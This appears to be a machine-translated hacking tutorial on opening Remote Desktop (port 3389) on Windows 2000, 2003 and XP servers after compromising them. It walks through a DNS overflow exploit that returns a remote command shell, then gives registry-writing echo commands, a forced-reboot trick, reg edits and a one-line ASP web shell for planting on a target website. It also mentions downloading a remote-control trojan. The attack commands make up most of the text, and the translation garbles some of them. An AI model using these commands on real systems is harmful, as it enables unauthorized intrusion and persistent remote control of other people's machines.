1, Win7, Win2003, XP system
REG ADD hklm\system\currentcontrolset\control\terminal "" Server/v fdenytsconnections/t reg_dword/d 00000000/f
2, 2000 system
Briefly describe how to perform a DNS overflow attack. I use the overflow program is Dns.exe, run it under CMD can see its use parameters and other information. Execute the "dns-s IP" command to detect the destination IP is a DNS overflow vulnerability, if there is an overflow attack, execute "dns-t 2000all IP 1207" prompts us to detect the return of the 1100 port shell. "Telnet IP 1100" succeeded in getting the returned Cmdshell. Note that the directory is c:/winnt/system32, and then what we need to do is write a 3389.reg registry file using the "echo" command. Copy the following line of code one line to the Cmdshell window and press ENTER to execute:
echo Windows Registry Editor Version 5.00 >3389.reg
Echo. >>3389.reg
echo [Hkey_local_machine/software/microsoft/windows/currentversion/netcache] >>3389.reg
echo "Enabled" = "0" >>3389.reg
echo [Hkey_local_machine/software/microsoft/windows Nt/currentversion/winlogon] >>3389.reg
echo "ShutdownWithoutLogon" = "0" >>3389.reg
echo [Hkey_local_machine/software/policies/microsoft/windows/installer] >>3389.reg
echo "Enableadmintsremote" =dword:00000001 >>3389.reg
echo [hkey_local_machine/system/currentcontrolset/control/terminal Server] >>3389.reg
echo "tsenabled" =dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CURRENTCONTROLSET/SERVICES/TERMDD] >>3389.reg
echo "Start" =dword:00000002 >>3389.reg
echo [Hkey_local_machine/system/currentcontrolset/services/termservice] >>3389.reg
echo "Start" =dword:00000002 >>3389.reg
echo [hkey_users/. Default/keyboard Layout/toggle] >>3389.reg
echo "Hotkey" = "1" >>3389.reg
echo [hkey_local_machine/system/currentcontrolset/control/terminal server/wds/rdpwd/tds/tcp] >>3389.reg
echo "PortNumber" =dword:00000d3d >>3389.reg
echo [hkey_local_machine/system/currentcontrolset/control/terminal server/winstations/rdp-tcp] >>3389.reg
echo "PortNumber" =dword:00000d3d >>3389.reg
Simply stated, the ">" symbol is overwritten to write to the file, if none is created, then overwrite the original content to write. ">>" is an append write, that is, the content of the original file is written on the basis of the following. Here is the write content to the 3389.reg file! Note that the second line, the effect is to write a line of space, because the format of the. reg file must be so! After the completion of the successful write, the import operation is performed and "regedit/s 3389.reg" is executed. So the registry file has been successfully imported into the registration table. However, it is important to note that in Cmdshell do not lose any of the characters, otherwise you will not be able to execute, it is recommended that you hit the Notepad first, make sure to copy to the Cmdshell window to execute. You can then restart the target host using this method. Execute the following code under Cmdshell:
@ECHO OFF & cd/d%temp% & ECHO [Version] > {Out}.inf
(Set Inf=installhinfsection DefaultInstall)
Echo signature= $chicago $ >> {Out}.inf
echo [DefaultInstall] >> {out}.inf
rundll32 setupapi,%inf% 1%temp%/{out}.inf R
In order to copy the above five lines of code line to Cmdshell, after copying a row to enter the execution, the five elements are executed, the server will be restarted. Of course, there are many ways to restart the server, such as the end of the system critical process, code simulation keys, and so can be, such as no accident, waiting for the server to complete the restart after the connection to the target Discovery Remote Desktop Services has been successfully opened. When the Windows 2000 operating system overflows, the Remote Desktop service is turned on after the Cmdshell is returned and completed successfully.
3, 2003 System
Compared to the 2000 system, it is easier to turn on Remote Desktop Services under 2003cmdshell, at least without rebooting! The first method is to use the "echo" command to write a 3389.reg file, and then "regedit/s 3389.reg" to import the registry file can be opened, relatively simple, similar to the 2000 method described above. Copy the following line of code one line to the Cmdshell window and press ENTER to execute:
echo Windows Registry Editor Version 5.00 >3389.reg
Echo. >>3389.reg
echo [hkey_local_machine/system/currentcontrolset/control/terminal Server] >>3389.reg
echo "Fdenytsconnections" =dword:00000000 >>3389.reg
echo [hkey_local_machine/system/currentcontrolset/control/terminal server/wds/rdpwd/tds/tcp] >>3389.reg
echo "PortNumber" =dword:00000d3d >>3389.reg
echo [hkey_local_machine/system/currentcontrolset/control/terminal server/winstations/rdp-tcp] >>3389.reg
echo "PortNumber" =dword:00000d3d >>3389.reg
Complete the above operation and then perform "regedit/s 3389.reg" import can take effect! However, this method is relatively troublesome. We can also use another simple way to turn on Remote Desktop services. Before introducing another method of operation, let's familiarize ourselves with one of the most critical registry keys for Remote Desktop Services under the 2003 system.
In the "Hkey_local_machine/system/currentcontrolset/control/terminal Server"
Under the value name of "Fdenytsconnections", you can see that its value data is 1 or 0. When the value is 1, turn off Remote Desktop Services when the value is 0. In other words, as long as we can change this key registry key value data under Cmdshell can achieve the purpose of enabling Remote Desktop Services! Fortunately, under 2003 there is a "reg" command that can do this completely. Here we find an operating system of 2003 of the server, through the same method as described above to overflow after the return of a Cmdshell. When we try to connect we will find that we can't connect at all. The following is a detailed explanation for using the "Reg" command to turn on Remote Desktop services. Perform:
Reg QUERY "Hkey_local_machine/system/currentcontrolset/control/terminal Server"
We found that the "fdenytsconnections" key value data is "0x1". This is 1 of the hexadecimal number. As mentioned above, the data is 1 without the Remote Desktop service turned on. All we have to do is change "0x1" to "0x0"! Directly with "REG add" is not possible, you must delete the original key value and then add! Execute under Cmdshell:
reg delete "hkey_local_machine/system/currentcontrolset/control/terminal Server"/V fdenytsconnections
Asks "Do you want to delete the registry value Fdenytsconnections", of course yes. Re-execution:
REG ADD "hkey_local_machine/system/currentcontrolset/control/terminal Server"/V fdenytsconnections/t reg_dword/d 0
The prompt operation completed successfully. This changes the value of "fdenytsconnections" to "0x0", which we can perform:
Reg QUERY "Hkey_local_machine/system/currentcontrolset/control/terminal Server"
Found that the data has been successfully changed. Now to connect to the server 3389 look, found that can be successfully connected on, create a user to play. At this point 2003 the way to open Remote Desktop Services is Cmdshell.
It is not necessary to open Remote Desktop Services under Cmdshell after overflow.
Can echo a vbs file, download the remote control Trojan, and then run a Trojan in the Cmdshell to connect.
There is the query target IP is bound to have a website, if there is a site directory, and then with Echo a word trojan in (the command is: echo "<%execute request (" cmd ")%>" > Web Path/ test.asp), with the Chinese annual kitchen knife connection, and then upload the big horse, upload open 3389 tools and then open also line.
Open remote Windows system 3389 port